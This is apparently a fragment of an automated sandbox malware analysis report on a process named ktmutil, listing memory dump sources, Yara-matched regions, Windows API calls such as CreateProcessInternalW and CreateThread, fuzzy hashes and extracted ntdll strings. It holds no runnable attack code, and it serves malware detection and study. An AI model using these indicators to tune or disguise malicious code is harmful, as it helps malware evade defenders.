              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: b562ae60fd54ef7e74e4fbad3805424dc02d567235dc5e9e358a0258f6bb919e
              • Instruction ID: 5308f72893adaac4c0d23ee44e843a4529182a1057510ffb36e2e2e9209fdb37
              • Opcode Fuzzy Hash: b562ae60fd54ef7e74e4fbad3805424dc02d567235dc5e9e358a0258f6bb919e
              • Instruction Fuzzy Hash: 55011EB5E0020DBBDB11DBA4DC42FDDB7B8AB54308F0041A5EA089B641F671EB548B91
              APIs
              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,003A7FAE,00000010,?,?,?,00000044,?,00000010,003A7FAE,?,00000000,?), ref: 003B94F0
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 63090f0baeb053bda6d4ac60e79ef039ec60d72c1d2e16f213e356ee6e17aee2
              • Instruction ID: 32860445fa680c3462c1e9349ea0c5c1e32880c722e6ee74cb2b929a132e7a7c
              • Opcode Fuzzy Hash: 63090f0baeb053bda6d4ac60e79ef039ec60d72c1d2e16f213e356ee6e17aee2
              • Instruction Fuzzy Hash: DE01C0B2214608BBCB44DF89DC81EDB77ADAF8C754F008108BA09E7241D631F9518BA4
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399AE5
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 11af324b4a60c09abd1f62ef8645fbb38898e5456f6142a1c9d3a5072eb7af22
              • Instruction ID: 656075ff99cf67e5423228f592cc21e405e7fb8b5dff84624898a0215ede74c9
              • Opcode Fuzzy Hash: 11af324b4a60c09abd1f62ef8645fbb38898e5456f6142a1c9d3a5072eb7af22
              • Instruction Fuzzy Hash: E0F06D3338021436E73161AA9C42FD7B29CDB80B61F24002AF70DEB2C0D892B90182E8
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399AE5
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 6d4f1229fcba532901cea21a074c56b1201924d4027cbacdeb0864da45f5760a
              • Instruction ID: ce5d62fffe968778c9698cd72a8abcf8f95c647d85d4f7a34afdbd6a18aa2038
              • Opcode Fuzzy Hash: 6d4f1229fcba532901cea21a074c56b1201924d4027cbacdeb0864da45f5760a
              • Instruction Fuzzy Hash: 28E0923228020433E63161AA8C43FD7725CCF80B50F240019F709EF2C0D891B90182E8
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a01e9167f8032926f0a8894ca66f941924564f316f1f19c19ea1cd2c057fbfa
              • Instruction ID: b884a01fa3bb69679dfa5d41a3686de7653fd648c82da8d81b501fc397221dc6
              • Opcode Fuzzy Hash: 0a01e9167f8032926f0a8894ca66f941924564f316f1f19c19ea1cd2c057fbfa
              • Instruction Fuzzy Hash: 1FF055145096AC7ACB22EE798802A83BFBADD87244F0404A8EAD067A03D544208A83D6
              APIs
              • RtlAllocateHeap.NTDLL(00000104,?,003B146C,?,?,003B146C,?,00000104,?), ref: 003B93EC
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 653eda6beaca97580ca9b1e8a35783d7e959db80bf7dc2155313d5db26253e23
              • Instruction ID: d3fae740d9df7831b818a36a7c12cf5496848be4f3fda33ba6760474a91a949c
              • Opcode Fuzzy Hash: 653eda6beaca97580ca9b1e8a35783d7e959db80bf7dc2155313d5db26253e23
              • Instruction Fuzzy Hash: 0DE06D716042047BDA14EE99DC42EDB33ACEFC9710F404418FA08AB241DA31B8118BB4
              APIs
              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,897F72E7,00000007,00000000,00000004,00000000,003A3A0D,000000F4), ref: 003B943F
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: f3ae2118e32b657e4fc6e5887cc66640ba6023f102721afeae8478fa6d0573ab
              • Instruction ID: bed695fb5d802b8bd52bd2414b1c09fa133d426c8cdaa56fd731821ba2463134
              • Opcode Fuzzy Hash: f3ae2118e32b657e4fc6e5887cc66640ba6023f102721afeae8478fa6d0573ab
              • Instruction Fuzzy Hash: 87E06D716042047BDA14EE99DC41FAB37ACEFC8710F104408FA08AB241D671B910CBB5
              APIs
              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 003A801C
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,003A1980,003B7C8F,OS;,003A194D), ref: 003A7E13
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,003A1980,003B7C8F,OS;,003A194D), ref: 003A7E13
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              Memory Dump Source
              • Source File: 0000000C.00000002.2981981929.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2c20000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2981981929.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2c20000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
              • API String ID: 0-3558027158
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              Strings
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02E74742
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02E74787
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02E74725
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02E74655
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02E746FC
              • Execute=1, xrefs: 02E74713
              • ExecuteOptions, xrefs: 02E746A0
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              Strings
              • RTL: Re-Waiting, xrefs: 02E7031E
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E702BD
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E702E7
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
              • API String ID: 0-2474120054
              Strings
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02E77B7F
              • RTL: Re-Waiting, xrefs: 02E77BAC
              • RTL: Resource at %p, xrefs: 02E77B8E
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E7728C
              Strings
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02E77294
              • RTL: Re-Waiting, xrefs: 02E772C1
              • RTL: Resource at %p, xrefs: 02E772A3
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2981981929.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2c20000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: $.#6$%8+2$'$nb&'
              • API String ID: 0-4016731361